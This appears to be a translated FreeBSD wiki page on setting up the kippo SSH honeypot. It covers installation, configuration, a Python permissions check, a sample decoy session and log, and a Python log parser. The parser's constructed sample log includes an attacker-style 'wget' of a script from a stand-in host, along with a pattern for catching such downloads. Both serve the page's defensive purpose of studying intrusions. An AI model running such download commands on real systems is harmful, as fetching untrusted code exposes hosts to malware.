kippo
From FreeBSD入門
kippo is an interactive SSH honeypot.
Pronunciation
- kippo
- きっぽ (kippo)
Overview
kippo is an SSH honeypot. The kippo installed from pkg behaves oddly, so it seems better to download it from GitHub. Because installing with pkg pulls in the dependencies in one go, a good approach is to install it with pkg first and then fetch the latest source with the git command.
Files that an attacker downloads with kippo's emulated wget command are stored in the dl directory, so kippo can be used to collect malware and other samples that attackers pull in.
Installation
$ sudo pkg install kippo
Installation example
$ sudo pkg install kippo
Updating FreeBSD repository catalogue...
Fetching meta.txz: 100%    944 B   0.9kB/s    00:01
Fetching packagesite.txz: 100%    5 MiB 330.3kB/s    00:16
Processing entries: 100%
FreeBSD repository update completed. 23798 packages processed.
The following 8 package(s) will be affected (of 0 checked):

New packages to be INSTALLED:
	kippo: 0.8
	py27-twistedWeb: 15.2.1
	py27-twistedCore: 15.2.1
	py27-service_identity: 14.0.0
	py27-characteristic: 14.1.0
	py27-asn1-modules: 0.0.6
	py27-zope.interface: 4.1.2
	py27-twistedConch: 15.2.1

The process will require 34 MiB more space.
4 MiB to be downloaded.

Proceed with this action? [y/N]: y
Fetching kippo-0.8.txz: 100%  383 KiB 196.1kB/s    00:02
Fetching py27-twistedWeb-15.2.1.txz: 100%  457 KiB 234.1kB/s    00:02
Fetching py27-twistedCore-15.2.1.txz: 100%    2 MiB 247.8kB/s    00:09
Fetching py27-service_identity-14.0.0.txz: 100%   12 KiB  12.3kB/s    00:01
Fetching py27-characteristic-14.1.0.txz: 100%   19 KiB  19.8kB/s    00:01
Fetching py27-asn1-modules-0.0.6.txz: 100%   49 KiB  50.5kB/s    00:01
Fetching py27-zope.interface-4.1.2.txz: 100%  171 KiB 175.0kB/s    00:01
Fetching py27-twistedConch-15.2.1.txz: 100%  453 KiB 154.6kB/s    00:03
Checking integrity... done (0 conflicting)
[1/8] Installing py27-characteristic-14.1.0...
[1/8] Extracting py27-characteristic-14.1.0: 100%
[2/8] Installing py27-asn1-modules-0.0.6...
[2/8] Extracting py27-asn1-modules-0.0.6: 100%
[3/8] Installing py27-service_identity-14.0.0...
[3/8] Extracting py27-service_identity-14.0.0: 100%
[4/8] Installing py27-zope.interface-4.1.2...
[4/8] Extracting py27-zope.interface-4.1.2: 100%
[5/8] Installing py27-twistedCore-15.2.1...
[5/8] Extracting py27-twistedCore-15.2.1: 100%
[6/8] Installing py27-twistedWeb-15.2.1...
[6/8] Extracting py27-twistedWeb-15.2.1: 100%
[7/8] Installing py27-twistedConch-15.2.1...
[7/8] Extracting py27-twistedConch-15.2.1: 100%
[8/8] Installing kippo-0.8...
===> Creating users and/or groups.
Creating group 'kippo' with gid '969'.
Creating user 'kippo' with uid '969'.
[8/8] Extracting kippo-0.8: 100%
Message for kippo-0.8:
kippo has been installed in the following directory:
/usr/local/share/kippo

Before starting kippo you need to perform the following steps:

1) Edit kippo's configuration file to suit your needs:
   $EDITOR /usr/local/share/kippo/kippo.cfg
   Please keep in mind when editing the configuration file that kippo
   can't be run as root and is started by the 'kippo' unprivileged user
   instead. This implies that the following folders hierarchy must be
   created and made writable to the 'kippo' user:
   dl/
   data/
   log/tty/

2) Add the following line to your rc.conf:
   kippo_enable="YES"
   Note that you can also set the 'kippo_logfile' and 'kippo_pidfile'
   variables to specify the path to the log file and pid file that will
   be used by kippo. The default values for those variables are
   '/tmp/kippo.log' and '/tmp/kippo.pid' respectively.

Then you can start kippo by issuing the following command:
   service kippo start
Configuration
Generate an RSA host key for the honeypot (no passphrase, since the daemon must start unattended) and make the kippo user its owner:
sudo /usr/bin/ssh-keygen -t rsa -f /usr/local/share/kippo/private.key -N ''
sudo mv /usr/local/share/kippo/private.key.pub /usr/local/share/kippo/public.key
sudo chown kippo:kippo /usr/local/share/kippo/*.key
Create the directories the daemon writes to and hand them to the kippo user. The pkg-message requires dl/, data/ and log/tty/ to be writable by that user, because kippo cannot run as root:
cd /usr/local/share/kippo
sudo mkdir dl data log
sudo chown kippo:kippo dl data log
sudo -u kippo mkdir log/tty
Finally, enable the service in /etc/rc.conf as the pkg-message says: kippo_enable="YES".
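To confirm the steps above took effect before running service kippo start, here is an added preflight check, written for this page and not part of kippo or the FreeBSD port. It assumes the default install directory /usr/local/share/kippo and the kippo user that pkg created, and reports directories that are missing or not writable by that user, missing host key files, and a private key readable by group or others. It tests mode bits against the kippo user's uid/gids rather than calling os.access(), so it answers correctly even when run as root. demo() builds a throwaway copy of the layout for the current user, so the logic can be exercised on any machine.

```python
import grp
import os
import pwd
import stat
import tempfile

# Directories the pkg-message says must be writable by the kippo user.
REQUIRED_DIRS = ("dl", "data", "log", "log/tty")
# Host key pair created with ssh-keygen in the configuration step.
REQUIRED_FILES = ("private.key", "public.key")


def user_ids(user):
    """(uid, set of gids) for `user`, or None if the account does not exist."""
    try:
        pw = pwd.getpwnam(user)
    except KeyError:
        return None
    gids = {pw.pw_gid} | {g.gr_gid for g in grp.getgrall() if user in g.gr_mem}
    return pw.pw_uid, gids


def writable_by(st, uid, gids):
    """Mode-bit check: may a process running as uid/gids write this inode?"""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def check_kippo_layout(base, user="kippo", ids=None):
    """Return a list of problems; an empty list means the layout is usable.

    `ids` may override the (uid, gids) lookup for `user`; demo() uses that
    to run the same checks as the current user in a temporary directory.
    """
    ids = ids or user_ids(user)
    if ids is None:
        return ["user %r does not exist (pkg install should have created it)" % user]
    uid, gids = ids
    problems = []
    for rel in REQUIRED_DIRS:
        path = os.path.join(base, rel)
        if not os.path.isdir(path):
            problems.append("missing directory %s" % path)
        elif not writable_by(os.stat(path), uid, gids):
            problems.append("%s is not writable by %s" % (path, user))
    for rel in REQUIRED_FILES:
        path = os.path.join(base, rel)
        if not os.path.isfile(path):
            problems.append("missing host key file %s" % path)
    priv = os.path.join(base, "private.key")
    if os.path.isfile(priv):
        st = os.stat(priv)
        if st.st_uid != uid:
            problems.append("%s is not owned by %s" % (priv, user))
        if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
            problems.append("%s is readable by group/other; chmod 600 it" % priv)
    return problems


def demo():
    """Build a throwaway layout for the current user, check it, then break it.

    Returns (problems for the complete layout, problems after log/tty is
    removed). This is constructed test data; the real run is against
    /usr/local/share/kippo with user="kippo".
    """
    me = (os.getuid(), set(os.getgroups()) | {os.getgid()})
    with tempfile.TemporaryDirectory() as base:
        for rel in REQUIRED_DIRS:
            os.makedirs(os.path.join(base, rel), exist_ok=True)
        for rel in REQUIRED_FILES:
            # 0600, as ssh-keygen creates private.key
            os.close(os.open(os.path.join(base, rel), os.O_WRONLY | os.O_CREAT, 0o600))
        good = check_kippo_layout(base, "current user", me)
        os.rmdir(os.path.join(base, "log", "tty"))
        broken = check_kippo_layout(base, "current user", me)
    return good, broken


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/usr/local/share/kippo"
    print("\n".join(check_kippo_layout(target)) or "layout OK")
```

Run it as root on the FreeBSD host (python3 check_kippo.py) after the chown steps; an empty report means the kippo user can write everywhere it needs to and nobody else can read the host private key.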
Starting
Start it as follows.
sudo service kippo start
Stop it as follows.
sudo service kippo stop
Directory meanings
- dl
- Files that attackers download with the emulated wget command are stored here.
- log/kippo.log
- kippo's log file. On FreeBSD the rc script passes its own log path to the daemon, /tmp/kippo.log unless kippo_logfile is set in rc.conf, which is why the log example below tails /tmp/kippo.log.
- log/tty/
- Per-session recordings of the terminal traffic.
- honeyfs
- Files that make up the fake filesystem shown to the attacker.
Default port
The default port is 2222. Because kippo runs as an unprivileged user it cannot bind port 22 itself; to receive real scans, the usual approach is to redirect port 22 to 2222 in the packet filter, or change ssh_port in kippo.cfg.
Usage
Try logging in
Connect to the honeypot from the same host. The password that works here, 123456, is the one in kippo's default user database (data/userdb.txt); the prompt and the command output that follow come from the emulated system, not from the FreeBSD host.
$ ssh -l root localhost -p 2222
The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
RSA key fingerprint is SHA256:ZZZZZZZZZZZZZZZZZZZZ.
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.
Password:
nas3:~#
nas3:~# ps -a
  PID TTY      STAT   TIME COMMAND
    1 ?        Ss     0:07 init [2]
    2 ?        S<     0:00 [kthreadd]
    3 ?        S<     0:00 [migration/0]
    4 ?        S<     0:00 [ksoftirqd/0]
    5 ?        S<     0:00 [watchdog/0]
    6 ?        S<     0:17 [events/0]
    7 ?        S<     0:00 [khelper]
   39 ?        S<     0:00 [kblockd/0]
   41 ?        S<     0:00 [kacpid]
   42 ?        S<     0:00 [kacpi_notify]
  170 ?        S<     0:00 [kseriod]
  207 ?        S      0:01 [pdflush]
  208 ?        S      0:00 [pdflush]
  209 ?        S<     0:00 [kswapd0]
  210 ?        S<     0:00 [aio/0]
  748 ?        S<     0:00 [ata/0]
  749 ?        S<     0:00 [ata_aux]
  929 ?        S<     0:00 [scsi_eh_0]
 1014 ?        D<     0:03 [kjournald]
 1087 ?        S<s    0:00 udevd --daemon
 1553 ?        S<     0:00 [kpsmoused]
 2054 ?        Sl     0:01 /usr/sbin/rsyslogd -c3
 2103 tty1     Ss     0:00 /bin/login --
 2105 tty2     Ss+    0:00 /sbin/getty 38400 tty2
 2107 tty3     Ss+    0:00 /sbin/getty 38400 tty3
 2109 tty4     Ss+    0:00 /sbin/getty 38400 tty4
 2110 tty5     Ss+    0:00 /sbin/getty 38400 tty5
 2112 tty6     Ss+    0:00 /sbin/getty 38400 tty6
 2133 ?        S<s    0:00 dhclient3 -pf /var/run/dhclient.eth0.pid -lf /var/lib
 4969 ?        Ss     0:00 /usr/sbin/sshd: root@pts/0
 5673 pts/0    Ss     0:00 -bash
 5679 pts/0    R+     0:00 ps -a
nas3:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:4c:a8:ab:32:f4
          inet addr:10.98.55.4  Bcast:10.98.55.255  Mask:255.255.255.0
          inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
          TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
          collisions:0 txqueuelen:1000
          RX bytes:50588302699 (47.1 GiB)  TX bytes:97318807157 (90.6 GiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
          TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:355278106 (338.8 MiB)  TX bytes:355278106 (338.8 MiB)
Log
Every connection, key exchange, credential tried and command typed is recorded in the log. The last line shows where the ifconfig output above really came from: a canned text file under txtcmds/, not a real interface.
$ tail -f /tmp/kippo.log
2015-07-09 02:14:08+0900 [-] New connection: 127.0.0.1:41836 (127.0.0.1:2222) [session: 0]
2015-07-09 02:14:08+0900 [-] Remote SSH version: SSH-2.0-OpenSSH_6.8-hpn14v5
2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] outgoing: aes128-ctr hmac-sha1 none
2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] incoming: aes128-ctr hmac-sha1 none
2015-07-09 02:14:11+0900 [HoneyPotTransport,0,127.0.0.1] NEW KEYS
2015-07-09 02:14:11+0900 [HoneyPotTransport,0,127.0.0.1] starting service ssh-userauth
2015-07-09 02:14:11+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] root trying auth none
2015-07-09 02:14:11+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] root trying auth keyboard-interactive
2015-07-09 02:14:15+0900 [-] login attempt [root/123456] succeeded
2015-07-09 02:14:15+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] root authenticated with keyboard-interactive
2015-07-09 02:14:15+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] starting service ssh-connection
2015-07-09 02:14:15+0900 [SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] got channel session request
2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] channel open
2015-07-09 02:14:15+0900 [SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] got global no-more-sessions@openssh.com request
2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] pty request: xterm-256color (71, 80, 0, 0)
2015-07-09 02:14:15+0900 [-] Terminal size: 71 80
2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] getting shell
2015-07-09 02:14:15+0900 [-] Opening TTY log: log/tty/20150709-021415-8938.log
2015-07-09 02:14:17+0900 [-] /etc/motd resolved into /etc/motd
2015-07-09 02:15:34+0900 [-] CMD: ls
2015-07-09 02:15:34+0900 [-] Command found: ls
2015-07-09 02:15:38+0900 [-] CMD: ls /bin
2015-07-09 02:15:38+0900 [-] Command found: ls /bin
2015-07-09 02:15:47+0900 [-] CMD: ps
2015-07-09 02:15:47+0900 [-] Command found: ps
2015-07-09 02:15:50+0900 [-] CMD: ps -a
2015-07-09 02:15:50+0900 [-] Command found: ps -a
2015-07-09 02:15:59+0900 [-] CMD: ifconfig
2015-07-09 02:15:59+0900 [-] Command found: ifconfig
2015-07-09 02:15:59+0900 [-] Reading txtcmd from "/usr/local/share/kippo/txtcmds/sbin/ifconfig"
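The lines above come from one hand-driven session; on an exposed honeypot the log fills with thousands of them, and the useful view is per source address: which credentials worked, what was typed, which commands the emulation did not know (a gap to fill in txtcmds/), and which URLs were fetched into dl/. The parser below is an added example written for this page, not code from kippo. Its sample log is constructed from the lines above plus a failed login, a wget and an unknown command in the same format; the wording of the "failed" and "Command not found" lines is assumed to match kippo's, and the URL uses a documentation address.

```python
import re
from collections import Counter

# Constructed sample in kippo.log format: lines from the session above plus
# a failed login, a wget and an unknown command. The 'failed' and
# 'Command not found' wording is assumed to match kippo's; 198.51.100.7 is
# a documentation address, not a real host.
SAMPLE_LOG = """\
2015-07-09 02:14:08+0900 [-] New connection: 127.0.0.1:41836 (127.0.0.1:2222) [session: 0]
2015-07-09 02:14:08+0900 [-] Remote SSH version: SSH-2.0-OpenSSH_6.8-hpn14v5
2015-07-09 02:14:11+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] root trying auth keyboard-interactive
2015-07-09 02:14:13+0900 [-] login attempt [root/toor] failed
2015-07-09 02:14:15+0900 [-] login attempt [root/123456] succeeded
2015-07-09 02:14:15+0900 [-] Opening TTY log: log/tty/20150709-021415-8938.log
2015-07-09 02:15:34+0900 [-] CMD: ls
2015-07-09 02:15:34+0900 [-] Command found: ls
2015-07-09 02:15:59+0900 [-] CMD: ifconfig
2015-07-09 02:15:59+0900 [-] Command found: ifconfig
2015-07-09 02:16:05+0900 [-] CMD: wget http://198.51.100.7/x.sh
2015-07-09 02:16:05+0900 [-] Command found: wget http://198.51.100.7/x.sh
2015-07-09 02:16:20+0900 [-] CMD: nproc
2015-07-09 02:16:20+0900 [-] Command not found: nproc
"""

# timestamp, [source], message
LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}[+-]\d{4}) "
                     r"\[(?P<src>[^\]]*)\] (?P<msg>.*)$")
# One regex per message type we care about; everything else is skipped.
# The password group is greedy so a ']' or '/' inside a password still parses.
MESSAGE_RES = (
    ("connection", re.compile(r"^New connection: (?P<ip>.+):(?P<port>\d+) \(.*\) \[session: (?P<sid>\d+)\]$")),
    ("version", re.compile(r"^Remote SSH version: (?P<ver>.+)$")),
    ("login", re.compile(r"^login attempt \[(?P<user>[^/]*)/(?P<pw>.*)\] (?P<result>succeeded|failed)$")),
    ("ttylog", re.compile(r"^Opening TTY log: (?P<path>.+)$")),
    ("cmd", re.compile(r"^CMD: (?P<cmd>.*)$")),
    ("cmd_not_found", re.compile(r"^Command not found: (?P<cmd>.*)$")),
)
DOWNLOAD_RE = re.compile(r"^(?:wget|curl)\b.*?(?P<url>https?://\S+)")


def parse_kippo_log(text):
    """Turn kippo.log text into a list of event dicts (kind, ts, fields)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # continuation line or foreign format
        for kind, rx in MESSAGE_RES:
            mm = rx.match(m.group("msg"))
            if mm:
                ev = {"kind": kind, "ts": m.group("ts")}
                ev.update(mm.groupdict())
                events.append(ev)
                break
    return events


def new_entry():
    return {"sessions": 0, "versions": set(), "creds": Counter(),
            "commands": [], "unknown": [], "ttylogs": []}


def summarize(events):
    """Aggregate events per source IP.

    Caveat: kippo writes the login/CMD/TTY lines with the '[-]' source, so
    they carry no session id. They are attributed here to the most recent
    'New connection' line, which is exact only while a single attacker is
    connected; for concurrent sessions fall back on the per-session tty logs.
    """
    summary, current = {}, None
    for ev in events:
        kind = ev["kind"]
        if kind == "connection":
            current = ev["ip"]
            summary.setdefault(current, new_entry())["sessions"] += 1
            continue
        if current is None:
            continue  # log was truncated before the first connection line
        entry = summary[current]
        if kind == "version":
            entry["versions"].add(ev["ver"])
        elif kind == "login":
            entry["creds"][(ev["user"], ev["pw"], ev["result"])] += 1
        elif kind == "ttylog":
            entry["ttylogs"].append(ev["path"])
        elif kind == "cmd":
            entry["commands"].append(ev["cmd"])
        elif kind == "cmd_not_found":
            entry["unknown"].append(ev["cmd"])
    return summary


def fetched_urls(commands):
    """URLs pulled with wget/curl: these are what ends up in dl/."""
    return [m.group("url") for m in map(DOWNLOAD_RE.match, commands) if m]


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for ip, e in summarize(parse_kippo_log(text)).items():
        print(ip, "sessions=%d" % e["sessions"], "clients=%s" % sorted(e["versions"]))
        for (user, pw, result), n in e["creds"].most_common():
            print("  %-9s %s/%s x%d" % (result, user, pw, n))
        print("  commands:", e["commands"])
        print("  unknown :", e["unknown"])
        print("  fetched :", fetched_urls(e["commands"]))
```

Point it at the real file with python3 kippo_summary.py /tmp/kippo.log. Treat the fetched URLs and the files in dl/ as hostile: inspect them on an isolated machine, never on the honeypot host.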
See also